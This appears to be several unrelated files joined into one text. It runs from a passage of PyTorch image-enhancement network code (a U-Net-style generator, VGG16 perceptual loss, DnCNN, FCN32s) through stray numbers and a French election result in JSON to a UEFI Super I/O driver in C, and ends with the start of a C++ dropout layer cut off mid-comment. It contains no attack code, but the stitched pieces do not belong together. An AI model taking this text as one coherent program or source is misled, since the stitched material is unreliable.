nn.Conv2d(128, 128, 3, padding=p) self.LReLU3_2 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn3_2 = SynBN2d(128) if self.opt.syn_norm else nn.BatchNorm2d(128) self.max_pool3 = nn.AvgPool2d(2) if self.opt.use_avgpool == 1 else nn.MaxPool2d(2) self.conv4_1 = nn.Conv2d(128, 256, 3, padding=p) self.LReLU4_1 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn4_1 = SynBN2d(256) if self.opt.syn_norm else nn.BatchNorm2d(256) self.conv4_2 = nn.Conv2d(256, 256, 3, padding=p) self.LReLU4_2 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn4_2 = SynBN2d(256) if self.opt.syn_norm else nn.BatchNorm2d(256) self.max_pool4 = nn.AvgPool2d(2) if self.opt.use_avgpool == 1 else nn.MaxPool2d(2) self.conv5_1 = nn.Conv2d(256, 512, 3, padding=p) self.LReLU5_1 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn5_1 = SynBN2d(512) if self.opt.syn_norm else nn.BatchNorm2d(512) self.conv5_2 = nn.Conv2d(512, 512, 3, padding=p) self.LReLU5_2 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn5_2 = SynBN2d(512) if self.opt.syn_norm else nn.BatchNorm2d(512) # self.deconv5 = nn.ConvTranspose2d(512, 256, 2, stride=2) self.deconv5 = nn.Conv2d(512, 256, 3, padding=p) self.conv6_1 = nn.Conv2d(512, 256, 3, padding=p) self.LReLU6_1 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn6_1 = SynBN2d(256) if self.opt.syn_norm else nn.BatchNorm2d(256) self.conv6_2 = nn.Conv2d(256, 256, 3, padding=p) self.LReLU6_2 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn6_2 = SynBN2d(256) if self.opt.syn_norm else nn.BatchNorm2d(256) # self.deconv6 = nn.ConvTranspose2d(256, 128, 2, stride=2) self.deconv6 = nn.Conv2d(256, 128, 3, padding=p) self.conv7_1 = nn.Conv2d(256, 128, 3, padding=p) self.LReLU7_1 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn7_1 = SynBN2d(128) if self.opt.syn_norm else nn.BatchNorm2d(128) self.conv7_2 = nn.Conv2d(128, 128, 3, padding=p) self.LReLU7_2 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn7_2 = SynBN2d(128) if self.opt.syn_norm else nn.BatchNorm2d(128) # self.deconv7 = nn.ConvTranspose2d(128, 64, 2, stride=2) self.deconv7 = nn.Conv2d(128, 64, 3, padding=p) self.conv8_1 = nn.Conv2d(128, 64, 3, padding=p) self.LReLU8_1 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn8_1 = SynBN2d(64) if self.opt.syn_norm else nn.BatchNorm2d(64) self.conv8_2 = nn.Conv2d(64, 64, 3, padding=p) self.LReLU8_2 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn8_2 = SynBN2d(64) if self.opt.syn_norm else nn.BatchNorm2d(64) # self.deconv8 = nn.ConvTranspose2d(64, 32, 2, stride=2) self.deconv8 = nn.Conv2d(64, 32, 3, padding=p) self.conv9_1 = nn.Conv2d(64, 32, 3, padding=p) self.LReLU9_1 = nn.LeakyReLU(0.2, inplace=True) if self.opt.use_norm == 1: self.bn9_1 = SynBN2d(32) if self.opt.syn_norm else nn.BatchNorm2d(32) self.conv9_2 = nn.Conv2d(32, 32, 3, padding=p) self.LReLU9_2 = nn.LeakyReLU(0.2, inplace=True) self.conv10 = nn.Conv2d(32, 3, 1) if self.opt.tanh: self.tanh = nn.Tanh() def depth_to_space(self, input, block_size): block_size_sq = block_size*block_size output = input.permute(0, 2, 3, 1) (batch_size, d_height, d_width, d_depth) = output.size() s_depth = int(d_depth / block_size_sq) s_width = int(d_width * block_size) s_height = int(d_height * block_size) t_1 = output.resize(batch_size, d_height, d_width, block_size_sq, s_depth) spl = t_1.split(block_size, 3) stack = [t_t.resize(batch_size, d_height, s_width, s_depth) for t_t in spl] output = torch.stack(stack,0).transpose(0,1).permute(0,2,1,3,4).resize(batch_size, s_height, s_width, s_depth) output = output.permute(0, 3, 1, 2) return output def forward(self, input, gray): flag = 0 if input.size()[3] > 2200: avg = nn.AvgPool2d(2) input = avg(input) gray = avg(gray) flag = 1 # pass input, pad_left, pad_right, pad_top, pad_bottom = pad_tensor(input) gray, pad_left, pad_right, pad_top, pad_bottom = pad_tensor(gray) if self.opt.self_attention: gray_2 = self.downsample_1(gray) gray_3 = self.downsample_2(gray_2) gray_4 = self.downsample_3(gray_3) gray_5 = self.downsample_4(gray_4) if self.opt.use_norm == 1: if self.opt.self_attention: x = self.bn1_1(self.LReLU1_1(self.conv1_1(torch.cat((input, gray), 1)))) # x = self.bn1_1(self.LReLU1_1(self.conv1_1(input))) else: x = self.bn1_1(self.LReLU1_1(self.conv1_1(input))) conv1 = self.bn1_2(self.LReLU1_2(self.conv1_2(x))) x = self.max_pool1(conv1) x = self.bn2_1(self.LReLU2_1(self.conv2_1(x))) conv2 = self.bn2_2(self.LReLU2_2(self.conv2_2(x))) x = self.max_pool2(conv2) x = self.bn3_1(self.LReLU3_1(self.conv3_1(x))) conv3 = self.bn3_2(self.LReLU3_2(self.conv3_2(x))) x = self.max_pool3(conv3) x = self.bn4_1(self.LReLU4_1(self.conv4_1(x))) conv4 = self.bn4_2(self.LReLU4_2(self.conv4_2(x))) x = self.max_pool4(conv4) x = self.bn5_1(self.LReLU5_1(self.conv5_1(x))) x = x*gray_5 if self.opt.self_attention else x conv5 = self.bn5_2(self.LReLU5_2(self.conv5_2(x))) conv5 = F.upsample(conv5, scale_factor=2, mode='bilinear') conv4 = conv4*gray_4 if self.opt.self_attention else conv4 up6 = torch.cat([self.deconv5(conv5), conv4], 1) x = self.bn6_1(self.LReLU6_1(self.conv6_1(up6))) conv6 = self.bn6_2(self.LReLU6_2(self.conv6_2(x))) conv6 = F.upsample(conv6, scale_factor=2, mode='bilinear') conv3 = conv3*gray_3 if self.opt.self_attention else conv3 up7 = torch.cat([self.deconv6(conv6), conv3], 1) x = self.bn7_1(self.LReLU7_1(self.conv7_1(up7))) conv7 = self.bn7_2(self.LReLU7_2(self.conv7_2(x))) conv7 = F.upsample(conv7, scale_factor=2, mode='bilinear') conv2 = conv2*gray_2 if self.opt.self_attention else conv2 up8 = torch.cat([self.deconv7(conv7), conv2], 1) x = self.bn8_1(self.LReLU8_1(self.conv8_1(up8))) conv8 = self.bn8_2(self.LReLU8_2(self.conv8_2(x))) conv8 = F.upsample(conv8, scale_factor=2, mode='bilinear') conv1 = conv1*gray if self.opt.self_attention else conv1 up9 = torch.cat([self.deconv8(conv8), conv1], 1) x = self.bn9_1(self.LReLU9_1(self.conv9_1(up9))) conv9 = self.LReLU9_2(self.conv9_2(x)) latent = self.conv10(conv9) if self.opt.times_residual: latent = latent*gray # output = self.depth_to_space(conv10, 2) if self.opt.tanh: latent = self.tanh(latent) if self.skip: if self.opt.linear_add: if self.opt.latent_threshold: latent = F.relu(latent) elif self.opt.latent_norm: latent = (latent - torch.min(latent))/(torch.max(latent)-torch.min(latent)) input = (input - torch.min(input))/(torch.max(input) - torch.min(input)) output = latent + input*self.opt.skip output = output*2 - 1 else: if self.opt.latent_threshold: latent = F.relu(latent) elif self.opt.latent_norm: latent = (latent - torch.min(latent))/(torch.max(latent)-torch.min(latent)) output = latent + input*self.opt.skip else: output = latent if self.opt.linear: output = output/torch.max(torch.abs(output)) elif self.opt.use_norm == 0: if self.opt.self_attention: x = self.LReLU1_1(self.conv1_1(torch.cat((input, gray), 1))) else: x = self.LReLU1_1(self.conv1_1(input)) conv1 = self.LReLU1_2(self.conv1_2(x)) x = self.max_pool1(conv1) x = self.LReLU2_1(self.conv2_1(x)) conv2 = self.LReLU2_2(self.conv2_2(x)) x = self.max_pool2(conv2) x = self.LReLU3_1(self.conv3_1(x)) conv3 = self.LReLU3_2(self.conv3_2(x)) x = self.max_pool3(conv3) x = self.LReLU4_1(self.conv4_1(x)) conv4 = self.LReLU4_2(self.conv4_2(x)) x = self.max_pool4(conv4) x = self.LReLU5_1(self.conv5_1(x)) x = x*gray_5 if self.opt.self_attention else x conv5 = self.LReLU5_2(self.conv5_2(x)) conv5 = F.upsample(conv5, scale_factor=2, mode='bilinear') conv4 = conv4*gray_4 if self.opt.self_attention else conv4 up6 = torch.cat([self.deconv5(conv5), conv4], 1) x = self.LReLU6_1(self.conv6_1(up6)) conv6 = self.LReLU6_2(self.conv6_2(x)) conv6 = F.upsample(conv6, scale_factor=2, mode='bilinear') conv3 = conv3*gray_3 if self.opt.self_attention else conv3 up7 = torch.cat([self.deconv6(conv6), conv3], 1) x = self.LReLU7_1(self.conv7_1(up7)) conv7 = self.LReLU7_2(self.conv7_2(x)) conv7 = F.upsample(conv7, scale_factor=2, mode='bilinear') conv2 = conv2*gray_2 if self.opt.self_attention else conv2 up8 = torch.cat([self.deconv7(conv7), conv2], 1) x = self.LReLU8_1(self.conv8_1(up8)) conv8 = self.LReLU8_2(self.conv8_2(x)) conv8 = F.upsample(conv8, scale_factor=2, mode='bilinear') conv1 = conv1*gray if self.opt.self_attention else conv1 up9 = torch.cat([self.deconv8(conv8), conv1], 1) x = self.LReLU9_1(self.conv9_1(up9)) conv9 = self.LReLU9_2(self.conv9_2(x)) latent = self.conv10(conv9) if self.opt.times_residual: latent = latent*gray if self.opt.tanh: latent = self.tanh(latent) if self.skip: if self.opt.linear_add: if self.opt.latent_threshold: latent = F.relu(latent) elif self.opt.latent_norm: latent = (latent - torch.min(latent))/(torch.max(latent)-torch.min(latent)) input = (input - torch.min(input))/(torch.max(input) - torch.min(input)) output = latent + input*self.opt.skip output = output*2 - 1 else: if self.opt.latent_threshold: latent = F.relu(latent) elif self.opt.latent_norm: latent = (latent - torch.min(latent))/(torch.max(latent)-torch.min(latent)) output = latent + input*self.opt.skip else: output = latent if self.opt.linear: output = output/torch.max(torch.abs(output)) output = pad_tensor_back(output, pad_left, pad_right, pad_top, pad_bottom) latent = pad_tensor_back(latent, pad_left, pad_right, pad_top, pad_bottom) gray = pad_tensor_back(gray, pad_left, pad_right, pad_top, pad_bottom) if flag == 1: output = F.upsample(output, scale_factor=2, mode='bilinear') gray = F.upsample(gray, scale_factor=2, mode='bilinear') if self.skip: return output, latent else: return output class DnCNN(nn.Module): def __init__(self, opt=None, depth=17, n_channels=64, image_channels=1, use_bnorm=True, kernel_size=3): super(DnCNN, self).__init__() kernel_size = 3 padding = 1 layers = [] layers.append(nn.Conv2d(in_channels=image_channels, out_channels=n_channels, kernel_size=kernel_size, padding=padding, bias=True)) layers.append(nn.ReLU(inplace=True)) for _ in range(depth-2): layers.append(nn.Conv2d(in_channels=n_channels, out_channels=n_channels, kernel_size=kernel_size, padding=padding, bias=False)) layers.append(nn.BatchNorm2d(n_channels, eps=0.0001, momentum = 0.95)) layers.append(nn.ReLU(inplace=True)) layers.append(nn.Conv2d(in_channels=n_channels, out_channels=image_channels, kernel_size=kernel_size, padding=padding, bias=False)) self.dncnn = nn.Sequential(*layers) self._initialize_weights() def forward(self, x): y = x out = self.dncnn(x) return y+out def _initialize_weights(self): for m in self.modules(): if isinstance(m, nn.Conv2d): init.orthogonal_(m.weight) print('init weight') if m.bias is not None: init.constant_(m.bias, 0) elif isinstance(m, nn.BatchNorm2d): init.constant_(m.weight, 1) init.constant_(m.bias, 0) class Vgg16(nn.Module): def __init__(self): super(Vgg16, self).__init__() self.conv1_1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1) self.conv1_2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1) self.conv2_1 = nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1) self.conv2_2 = nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1) self.conv3_1 = nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1) self.conv3_2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1) self.conv3_3 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1) self.conv4_1 = nn.Conv2d(256, 512, kernel_size=3, stride=1, padding=1) self.conv4_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv4_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv5_1 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv5_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv5_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) def forward(self, X, opt): h = F.relu(self.conv1_1(X), inplace=True) h = F.relu(self.conv1_2(h), inplace=True) # relu1_2 = h h = F.max_pool2d(h, kernel_size=2, stride=2) h = F.relu(self.conv2_1(h), inplace=True) h = F.relu(self.conv2_2(h), inplace=True) # relu2_2 = h h = F.max_pool2d(h, kernel_size=2, stride=2) h = F.relu(self.conv3_1(h), inplace=True) h = F.relu(self.conv3_2(h), inplace=True) h = F.relu(self.conv3_3(h), inplace=True) # relu3_3 = h if opt.vgg_choose != "no_maxpool": h = F.max_pool2d(h, kernel_size=2, stride=2) h = F.relu(self.conv4_1(h), inplace=True) relu4_1 = h h = F.relu(self.conv4_2(h), inplace=True) relu4_2 = h conv4_3 = self.conv4_3(h) h = F.relu(conv4_3, inplace=True) relu4_3 = h if opt.vgg_choose != "no_maxpool": if opt.vgg_maxpooling: h = F.max_pool2d(h, kernel_size=2, stride=2) relu5_1 = F.relu(self.conv5_1(h), inplace=True) relu5_2 = F.relu(self.conv5_2(relu5_1), inplace=True) conv5_3 = self.conv5_3(relu5_2) h = F.relu(conv5_3, inplace=True) relu5_3 = h if opt.vgg_choose == "conv4_3": return conv4_3 elif opt.vgg_choose == "relu4_2": return relu4_2 elif opt.vgg_choose == "relu4_1": return relu4_1 elif opt.vgg_choose == "relu4_3": return relu4_3 elif opt.vgg_choose == "conv5_3": return conv5_3 elif opt.vgg_choose == "relu5_1": return relu5_1 elif opt.vgg_choose == "relu5_2": return relu5_2 elif opt.vgg_choose == "relu5_3" or "maxpool": return relu5_3 def vgg_preprocess(batch, opt): tensortype = type(batch.data) (r, g, b) = torch.chunk(batch, 3, dim = 1) batch = torch.cat((b, g, r), dim = 1) # convert RGB to BGR batch = (batch + 1) * 255 * 0.5 # [-1, 1] -> [0, 255] if opt.vgg_mean: mean = tensortype(batch.data.size()) mean[:, 0, :, :] = 103.939 mean[:, 1, :, :] = 116.779 mean[:, 2, :, :] = 123.680 batch = batch.sub(Variable(mean)) # subtract mean return batch class PerceptualLoss(nn.Module): def __init__(self, opt): super(PerceptualLoss, self).__init__() self.opt = opt self.instancenorm = nn.InstanceNorm2d(512, affine=False) def compute_vgg_loss(self, vgg, img, target): img_vgg = vgg_preprocess(img, self.opt) target_vgg = vgg_preprocess(target, self.opt) img_fea = vgg(img_vgg, self.opt) target_fea = vgg(target_vgg, self.opt) if self.opt.no_vgg_instance: return torch.mean((img_fea - target_fea) ** 2) else: return torch.mean((self.instancenorm(img_fea) - self.instancenorm(target_fea)) ** 2) def load_vgg16(model_dir, gpu_ids): """ Use the model from https://github.com/abhiskk/fast-neural-style/blob/master/neural_style/utils.py """ if not os.path.exists(model_dir): os.mkdir(model_dir) # if not os.path.exists(os.path.join(model_dir, 'vgg16.weight')): # if not os.path.exists(os.path.join(model_dir, 'vgg16.t7')): # os.system('wget https://www.dropbox.com/s/76l3rt4kyi3s8x7/vgg16.t7?dl=1 -O ' + os.path.join(model_dir, 'vgg16.t7')) # vgglua = load_lua(os.path.join(model_dir, 'vgg16.t7')) # vgg = Vgg16() # for (src, dst) in zip(vgglua.parameters()[0], vgg.parameters()): # dst.data[:] = src # torch.save(vgg.state_dict(), os.path.join(model_dir, 'vgg16.weight')) vgg = Vgg16() # vgg.cuda() vgg.cuda(device=gpu_ids[0]) vgg.load_state_dict(torch.load(os.path.join(model_dir, 'vgg16.weight'))) vgg = torch.nn.DataParallel(vgg, gpu_ids) return vgg class FCN32s(nn.Module): def __init__(self, n_class=21): super(FCN32s, self).__init__() # conv1 self.conv1_1 = nn.Conv2d(3, 64, 3, padding=100) self.relu1_1 = nn.ReLU(inplace=True) self.conv1_2 = nn.Conv2d(64, 64, 3, padding=1) self.relu1_2 = nn.ReLU(inplace=True) self.pool1 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/2 # conv2 self.conv2_1 = nn.Conv2d(64, 128, 3, padding=1) self.relu2_1 = nn.ReLU(inplace=True) self.conv2_2 = nn.Conv2d(128, 128, 3, padding=1) self.relu2_2 = nn.ReLU(inplace=True) self.pool2 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/4 # conv3 self.conv3_1 = nn.Conv2d(128, 256, 3, padding=1) self.relu3_1 = nn.ReLU(inplace=True) self.conv3_2 = nn.Conv2d(256, 256, 3, padding=1) self.relu3_2 = nn.ReLU(inplace=True) self.conv3_3 = nn.Conv2d(256, 256, 3, padding=1) self.relu3_3 = nn.ReLU(inplace=True) self.pool3 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/8 # conv4 self.conv4_1 = nn.Conv2d(256, 512, 3, padding=1) self.relu4_1 = nn.ReLU(inplace=True) self.conv4_2 = nn.Conv2d(512, 512, 3, padding=1) self.relu4_2 = nn.ReLU(inplace=True) self.conv4_3 = nn.Conv2d(512, 512, 3, padding=1) self.relu4_3 = nn.ReLU(inplace=True) self.pool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/16 # conv5 self.conv5_1 = nn.Conv2d(512, 512, 3, padding=1) self.relu5_1 = nn.ReLU(inplace=True) self.conv5_2 = nn.Conv2d(512, 512, 3, padding=1) self.relu5_2 = nn.ReLU(inplace=True) self.conv5_3 = nn.Conv2d(512, 512, 3, padding=1) self.relu5_3 = nn.ReLU(inplace=True) self.pool5 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/32 # fc6 self.fc6 = nn.Conv2d(512, 4096, 7) self.relu6 = nn.ReLU(inplace=True) self.drop6 = nn.Dropout2d() # fc7 self.fc7 = nn.Conv2d(4096, 4096, 1) self.relu7 = nn.ReLU(inplace=True) self.drop7 = nn.Dropout2d() self.score_fr = nn.Conv2d(4096, n_class, 1) self.upscore = nn.ConvTranspose2d(n_class, n_class, 64, stride=32, bias=False) def _initialize_weights(self): for m in self.modules(): if isinstance(m, nn.Conv2d): m.weight.data.zero_() if m.bias is not None: m.bias.data.zero_() if isinstance(m, nn.ConvTranspose2d): assert m.kernel_size[0] == m.kernel_size[1] initial_weight = get_upsampling_weight( m.in_channels, m.out_channels, m.kernel_size[0]) m.weight.data.copy_(initial_weight) def forward(self, x): h = x h = self.relu1_1(self.conv1_1(h)) h = self.relu1_2(self.conv1_2(h)) h = self.pool1(h) h = self.relu2_1(self.conv2_1(h)) h = self.relu2_2(self.conv2_2(h)) h = self.pool2(h) h = self.relu3_1(self.conv3_1(h)) h = self.relu3_2(self.conv3_2(h)) h = self.relu3_3(self.conv3_3(h)) h = self.pool3(h) h = self.relu4_1(self.conv4_1(h)) h = self.relu4_2(self.conv4_2(h)) h = self.relu4_3(self.conv4_3(h)) h = self.pool4(h) h = self.relu5_1(self.conv5_1(h)) h = self.relu5_2(self.conv5_2(h)) h = self.relu5_3(self.conv5_3(h)) h = self.pool5(h) h = self.relu6(self.fc6(h)) h = self.drop6(h) h = self.relu7(self.fc7(h)) h = self.drop7(h) h = self.score_fr(h) h = self.upscore(h) h = h[:, :, 19:19 + x.size()[2], 19:19 + x.size()[3]].contiguous() return h def load_fcn(model_dir): fcn = FCN32s() fcn.load_state_dict(torch.load(os.path.join(model_dir, 'fcn32s_from_caffe.pth'))) fcn.cuda() return fcn class SemanticLoss(nn.Module): def __init__(self, opt): super(SemanticLoss, self).__init__() self.opt = opt self.instancenorm = nn.InstanceNorm2d(21, affine=False) def compute_fcn_loss(self, fcn, img, target): img_fcn = vgg_preprocess(img, self.opt) target_fcn = vgg_preprocess(target, self.opt) img_fea = fcn(img_fcn) target_fea = fcn(target_fcn) return torch.mean((self.instancenorm(img_fea) - self.instancenorm(target_fea)) ** 2)
25,805
348
{"nom":"Nègrepelisse","circ":"1ère circonscription","dpt":"Tarn-et-Garonne","inscrits":3912,"abs":1935,"votants":1977,"blancs":45,"nuls":15,"exp":1917,"res":[{"nuance":"REM","nom":"<NAME>","voix":558},{"nuance":"FN","nom":"<NAME>","voix":444},{"nuance":"SOC","nom":"Mme <NAME>","voix":346},{"nuance":"LR","nom":"M. <NAME>","voix":224},{"nuance":"FI","nom":"Mme <NAME>","voix":214},{"nuance":"ECO","nom":"<NAME>","voix":46},{"nuance":"DLF","nom":"Mme <NAME>","voix":22},{"nuance":"COM","nom":"M. <NAME>","voix":20},{"nuance":"EXG","nom":"<NAME>","voix":18},{"nuance":"ECO","nom":"Mme <NAME>","voix":14},{"nuance":"DIV","nom":"Mme <NAME>","voix":11}]}
262
373
<gh_stars>100-1000 /** @file Super I/O Interface implementation. Copyright (c) 2010 - 2019 Intel Corporation. All rights reserved. <BR> SPDX-License-Identifier: BSD-2-Clause-Patent **/ #include "SioDriver.h" /** Provides an interface to get a list of the current resources consumed by the device in the ACPI Resource Descriptor format. GetResources() returns a list of resources currently consumed by the device. The ResourceList is a pointer to the buffer containing resource descriptors for the device. The descriptors are in the format of Small or Large ACPI resource descriptor as defined by ACPI specification (2.0 & 3.0). The buffer of resource descriptors is terminated with the 'End tag' resource descriptor. @param[in] This Indicates a pointer to the calling context. @param[out] ResourceList A pointer to an ACPI resource descriptor list that defines the current resources used by the device. Type ACPI_RESOURCE_HEADER_PTR is defined in the "Related Definitions" below. @retval EFI_SUCCESS The operation completed successfully @retval EFI_INVALID_PARAMETER ResourceList is NULL **/ EFI_STATUS EFIAPI SioGetResources ( IN CONST EFI_SIO_PROTOCOL *This, OUT ACPI_RESOURCE_HEADER_PTR *ResourceList ) { SIO_DEV *SioDev; if (ResourceList == NULL) { return EFI_INVALID_PARAMETER; } SioDev = SIO_DEV_FROM_THIS (This); return DeviceGetResources (&SioDev->Device, ResourceList); } /** Provides a collection of resource descriptor lists. Each resource descriptor list in the collection defines a combination of resources that can potentially be used by the device. @param[in] This Indicates a pointer to the calling context. @param[out] ResourceCollection Collection of the resource descriptor lists. @retval EFI_SUCCESS The operation completed successfully @retval EFI_INVALID_PARAMETER ResourceCollection is NULL **/ EFI_STATUS EFIAPI SioPossibleResources ( IN CONST EFI_SIO_PROTOCOL *This, OUT ACPI_RESOURCE_HEADER_PTR *ResourceCollection ) { SIO_DEV *SioDev; if (ResourceCollection == NULL) { return EFI_INVALID_PARAMETER; } SioDev = SIO_DEV_FROM_THIS (This); return DevicePossibleResources (&SioDev->Device, ResourceCollection); } /** Sets the resources for the device. @param[in] This Indicates a pointer to the calling context. @param[in] ResourceList Pointer to the ACPI resource descriptor list. Type ACPI_RESOURCE_HEADER_PTR is defined in the "Related Definitions" section of EFI_SIO_PROTOCOL.GetResources(). @retval EFI_SUCCESS The operation completed successfully @retval EFI_INVALID_PARAMETER ResourceList is invalid @retval EFI_ACCESS_DENIED Some of the resources in ResourceList are in use **/ EFI_STATUS EFIAPI SioSetResources ( IN CONST EFI_SIO_PROTOCOL *This, IN ACPI_RESOURCE_HEADER_PTR ResourceList ) { SIO_DEV *SioDev; ACPI_RESOURCE_HEADER_PTR ResourcePtr; ACPI_RESOURCE_HEADER_PTR ResourceCollection; ACPI_RESOURCE_HEADER_PTR ResourcePtr2; BOOLEAN Found; ResourcePtr = ResourceList; SioDev = SIO_DEV_FROM_THIS (This); // // Check whether the resource is in the possible resource collection // DevicePossibleResources (&SioDev->Device, &ResourceCollection); while (ResourcePtr.SmallHeader->Byte != ACPI_END_TAG_DESCRIPTOR) { Found = FALSE; ResourcePtr2 = ResourceCollection; while (ResourcePtr2.SmallHeader->Byte != ACPI_END_TAG_DESCRIPTOR) { if (ResourcePtr2.SmallHeader->Bits.Type == 0) { // // Small Header // if (CompareMem ( ResourcePtr2.SmallHeader, ResourcePtr.SmallHeader, ResourcePtr2.SmallHeader->Bits.Length + sizeof (*ResourcePtr2.SmallHeader) ) == 0) { Found = TRUE; break; } ResourcePtr2.SmallHeader = (ACPI_SMALL_RESOURCE_HEADER *) ((UINT8 *) ResourcePtr2.SmallHeader + ResourcePtr2.SmallHeader->Bits.Length + sizeof (*ResourcePtr2.SmallHeader)); } else { // // Large Header // if (CompareMem ( ResourcePtr2.LargeHeader, ResourcePtr.LargeHeader, ResourcePtr2.LargeHeader->Length + sizeof (*ResourcePtr2.LargeHeader) ) == 0) { Found = TRUE; break; } ResourcePtr2.LargeHeader = (ACPI_LARGE_RESOURCE_HEADER *) ((UINT8 *) ResourcePtr2.LargeHeader + ResourcePtr2.LargeHeader->Length + sizeof (*ResourcePtr2.LargeHeader)); } } if (!Found) { return EFI_ACCESS_DENIED; } if (ResourcePtr.SmallHeader->Bits.Type == 0) { ResourcePtr.SmallHeader = (ACPI_SMALL_RESOURCE_HEADER *) ((UINT8 *) ResourcePtr.SmallHeader + ResourcePtr.SmallHeader->Bits.Length + sizeof (*ResourcePtr.SmallHeader)); } else { ResourcePtr.LargeHeader = (ACPI_LARGE_RESOURCE_HEADER *) ((UINT8 *) ResourcePtr.LargeHeader + ResourcePtr.LargeHeader->Length + sizeof (*ResourcePtr.LargeHeader)); } } // // ResourceList can be set // return DeviceSetResources (&SioDev->Device, ResourceList); } /** Provides a low level access to the registers for the Super I/O. @param[in] This Indicates a pointer to the calling context. @param[in] Write Specifies the type of the register operation. If this parameter is TRUE, Value is interpreted as an input parameter and the operation is a register write. If this parameter is FALSE, Value is interpreted as an output parameter and the operation is a register read. @param[in] ExitCfgMode Exit Configuration Mode Indicator. If this parameter is set to TRUE, the Super I/O driver will turn off configuration mode of the Super I/O prior to returning from this function. If this parameter is set to FALSE, the Super I/O driver will leave Super I/O in the configuration mode. The Super I/O driver must track the current state of the Super I/O and enable the configuration mode of Super I/O if necessary prior to register access. @param[in] Register Register number. @param[in, out] Value If Write is TRUE, Value is a pointer to the buffer containing the byte of data to be written to the Super I/O register. If Write is FALSE, Value is a pointer to the destination buffer for the byte of data to be read from the Super I/O register. @retval EFI_SUCCESS The operation completed successfully @retval EFI_INVALID_PARAMETER The Value is NULL @retval EFI_INVALID_PARAMETER Invalid Register number **/ EFI_STATUS EFIAPI SioRegisterAccess ( IN CONST EFI_SIO_PROTOCOL *This, IN BOOLEAN Write, IN BOOLEAN ExitCfgMode, IN UINT8 Register, IN OUT UINT8 *Value ) { if (Value == NULL) { return EFI_INVALID_PARAMETER; } return EFI_SUCCESS; } /** Provides an interface for a table based programming of the Super I/O registers. The Modify() function provides an interface for table based programming of the Super I/O registers. This function can be used to perform programming of multiple Super I/O registers with a single function call. For each table entry, the Register is read, its content is bitwise ANDed with AndMask, and then ORed with OrMask before being written back to the Register. The Super I/O driver must track the current state of the Super I/O and enable the configuration mode of Super I/ O if necessary prior to table processing. Once the table is processed, the Super I/O device has to be returned to the original state. @param[in] This Indicates a pointer to the calling context. @param[in] Command A pointer to an array of NumberOfCommands EFI_SIO_REGISTER_MODIFY structures. Each structure specifies a single Super I/O register modify operation. Type EFI_SIO_REGISTER_MODIFY is defined in the "Related Definitions" below. @param[in] NumberOfCommands Number of elements in the Command array. @retval EFI_SUCCESS The operation completed successfully @retval EFI_INVALID_PARAMETER Command is NULL **/ EFI_STATUS EFIAPI SioModify ( IN CONST EFI_SIO_PROTOCOL *This, IN CONST EFI_SIO_REGISTER_MODIFY *Command, IN UINTN NumberOfCommands ) { if (Command == NULL) { return EFI_INVALID_PARAMETER; } return EFI_SUCCESS; }
4,367
651
/****************************************************************************** * Copyright (c) Intel Corporation - All rights reserved. * * This file is part of the LIBXSMM library. * * * * For information on the license, see the LICENSE file. * * Further information: https://github.com/hfp/libxsmm/ * * SPDX-License-Identifier: BSD-3-Clause * ******************************************************************************/ /* <NAME>, <NAME> (Intel Corp.) ******************************************************************************/ #include <string> #include "Dropout.hpp" #include "fillers.hpp" #define PRIME_SEED 131 using namespace std; using namespace gxm; DropoutNode::DropoutNode(DropoutParams* p, MLEngine* e): NNNode(p, e) { nname_ = p->get_node_name(); ntype_ = p->get_node_type(); mode_ = p->get_mode(); bottom_ = p->get_bottom_names(); top_ = p->get_top_names(); bp_flag_ = p->get_bprop_flag(); has_weights_ = false; assert((bottom_.size() == 1) && (top_.size() == 1)); tenTop_ = new Tensor(top_[0]); assert(tenTop_ != NULL); tenTop_->setOwner(this); tenTop_->setType(ACT); tenTopData_ = tenTop_->getBuf(DATA); tenTopData_->setBufferType(DATA); #ifdef DEBUG printf("bottom name %s\n",bottom_[0].c_str()); #endif tenBot_ = e->get_tensor(bottom_[0], ACT); assert(tenBot_ != NULL); setPrevNode((NNNode*)tenBot_->getOwner()); tenBotData_ = tenBot_->getBuf(DATA); //Output tensor data type = input tensor data type int dtype = p->get_data_type(); tenTopData_->setDataType(dtype); // Get input tensor shape (bottom) Shape* bs = tenBot_->getShape(); assert(bs->ndims <= MAX_DIMS); Shape ts; shape_setzero(&ts); ts.ndims = bs->ndims; for(int i=0; i < bs->ndims; i++) ts.dims[i] = bs->dims[i]; tenTop_->setShape(&ts); long long int tsize = 1; for(int i=0; i<ts.ndims; i++) tsize = tsize*ts.dims[i]; // Mask to select neuron activations to be dropped out tenMask_ = new int[tsize]; if(dtype == DT_FLOAT) tsize = tsize*sizeof(float); else if(dtype == DT_INT16) tsize = tsize*sizeof(short int); // Set the logical size of the tensor buffer for bufId=0 (forward data buffer). // Note: we have no knowledge of the 